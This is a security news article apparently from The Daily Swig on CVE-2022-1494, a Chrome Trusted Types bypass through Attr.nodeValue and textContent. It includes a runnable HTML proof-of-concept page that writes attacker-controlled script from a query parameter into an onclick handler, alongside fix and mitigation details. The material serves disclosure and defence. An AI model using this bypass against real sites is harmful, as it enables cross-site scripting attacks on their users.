Untrusted types: Researcher demos trick to beat Trusted Types protection in Google Chrome

Flaws in the protection mechanism leave websites more exposed to DOM XSS-based attacks

PortSwigger

John Leyden 27 June 2022 at 15:25 UTC

Security researchers have found that several DOM properties are not covered by Trusted Types, a web security mechanism, which allows the protection to be bypassed in some scenarios.

Trusted Types is an important technology that lets a website require that values written to dangerous DOM (Document Object Model) sinks, such as innerHTML or event-handler attributes, first pass through a policy the site defines, a useful technique in guarding against DOM-based cross-site scripting (XSS) attacks.

A bypass discovered by well-known researcher Masato Kinugawa uses properties of attribute (Attr) nodes to sidestep the checks Trusted Types would normally apply.

If a site modified the value of an existing attribute through the Attr node's nodeValue or textContent properties, as explained in a post on a Chrome security mailing list, Trusted Types ignored the assignment completely. A site that used these properties and was otherwise vulnerable to DOM XSS would therefore get no protection from Trusted Types, Kinugawa found.
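The guarded and unguarded code paths from the paragraph above, side by side on one page, as an added demonstration constructed for this article (it is not Kinugawa's proof of concept and not code from the Chromium project). The policy name `demo`, the `cb` query parameter and the toy policy rule are assumptions made for the demo; the vulnerable-versus-patched behaviour in step 3 is what the report and the CVE entry describe.

```html
<!doctype html>
<meta charset="utf-8">
<!-- Enforce Trusted Types for script sinks and allow only a policy named "demo" (assumed name) -->
<meta http-equiv="Content-Security-Policy"
      content="require-trusted-types-for 'script'; trusted-types demo">
<title>Trusted Types: guarded sink vs. Attr.nodeValue (CVE-2022-1494)</title>

<!-- The bypass needs an attribute that already exists; here it is present in static markup -->
<button id="btn" onclick="void 0">Click me</button>
<pre id="log"></pre>

<script>
  const out = document.getElementById('log');
  const log = (msg) => { out.textContent += msg + '\n'; };

  // Attacker-controlled input. Assumption for the demo: it arrives in the ?cb= query parameter.
  // A harmless default keeps the page doing something visible when no parameter is given.
  const untrusted = new URLSearchParams(location.search).get('cb')
                    || "console.log('handler ran with attacker-controlled code')";

  if (!window.trustedTypes) {
    log('This browser does not implement Trusted Types; nothing to demonstrate.');
  } else {
    const btn = document.getElementById('btn');

    // 1. A guarded sink: setAttribute on an event-handler attribute requires a TrustedScript,
    //    so a raw string throws a TypeError once the CSP above is in effect.
    try {
      btn.setAttribute('onclick', untrusted);
      log('1. setAttribute accepted a raw string: enforcement is NOT active');
    } catch (e) {
      log('1. setAttribute blocked by Trusted Types: ' + e.message);
    }

    // 2. The sanctioned route: the value passes through the site's policy, which may reject it.
    //    The rule below is a toy for the demo (assumed, not from the article); a real policy
    //    is application-specific and usually far stricter.
    const policy = trustedTypes.createPolicy('demo', {
      createScript: (s) => {
        if (!/^console\.log\('[\w -]*'\)$/.test(s)) throw new TypeError('policy rejected: ' + s);
        return s;
      },
    });
    try {
      btn.setAttribute('onclick', policy.createScript("console.log('policy-approved handler')"));
      log('2. setAttribute accepted a TrustedScript created by the "demo" policy');
    } catch (e) {
      log('2. policy rejected the value: ' + e.message);
    }

    // 3. The unguarded path Kinugawa reported: write the same raw string into the existing
    //    attribute through its Attr node. Chrome before 101.0.4951.41 applied no Trusted Types
    //    check here, so the string lands in the handler unchanged; a patched build should
    //    reject it just like step 1 did.
    const attr = btn.getAttributeNode('onclick');
    try {
      attr.nodeValue = untrusted;        // attr.textContent took the same unchecked path
      log('3. Attr.nodeValue accepted a raw string; handler is now: ' + btn.getAttribute('onclick'));
    } catch (e) {
      log('3. Attr.nodeValue blocked (patched build): ' + e.message);
    }
  }
</script>
```

Open the page in Chrome and append `?cb=<payload>` to supply the input. On a build from before the fix, step 1 is blocked while step 3 silently installs the attacker's string as the click handler, which is the whole point of the report: the site's policy never sees the value. On Chrome 101.0.4951.41 or later, step 3 should fail with the same TypeError as step 1. Until every supported browser enforces the check, the defensive habit on the site side is to treat Attr.nodeValue and Attr.textContent as sinks and route their values through a policy, exactly as step 2 does for setAttribute.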

The vulnerability was demonstrated in Chrome v100.0.4892.0 (Official Build) canary (64-bit). Other versions of Chrome and other browsers may be vulnerable, but this has not been tested.

The latest versions of Chrome address the problem; the fix shipped in Chrome 101.0.4951.41 (see the CVE entry below).

The vulnerability – tracked as CVE-2022-1494 and said to involve “insufficient data validation in Trusted Types” – was first reported on February 16 but details were only publicly released last week.

The Daily Swig contacted both Kinugawa and Krzysztof Kotowicz, the Google software engineer who created Trusted Types, for comment. No word back, as yet, but we’ll update this story as and when more information comes to hand.

Related: Google checks rise of DOM XSS with Trusted Types

Related news

Gentoo Linux Security Advisory 202208-25

Gentoo Linux Security Advisory 202208-25 - Multiple vulnerabilities have been found in Chromium and its derivatives, the worst of which could result in remote code execution. Versions less than 5.15.5_p20220618 are affected.

CVE-2022-1494

Insufficient data validation in Trusted Types in Google Chrome prior to 101.0.4951.41 allowed a remote attacker to bypass trusted types policy via a crafted HTML page.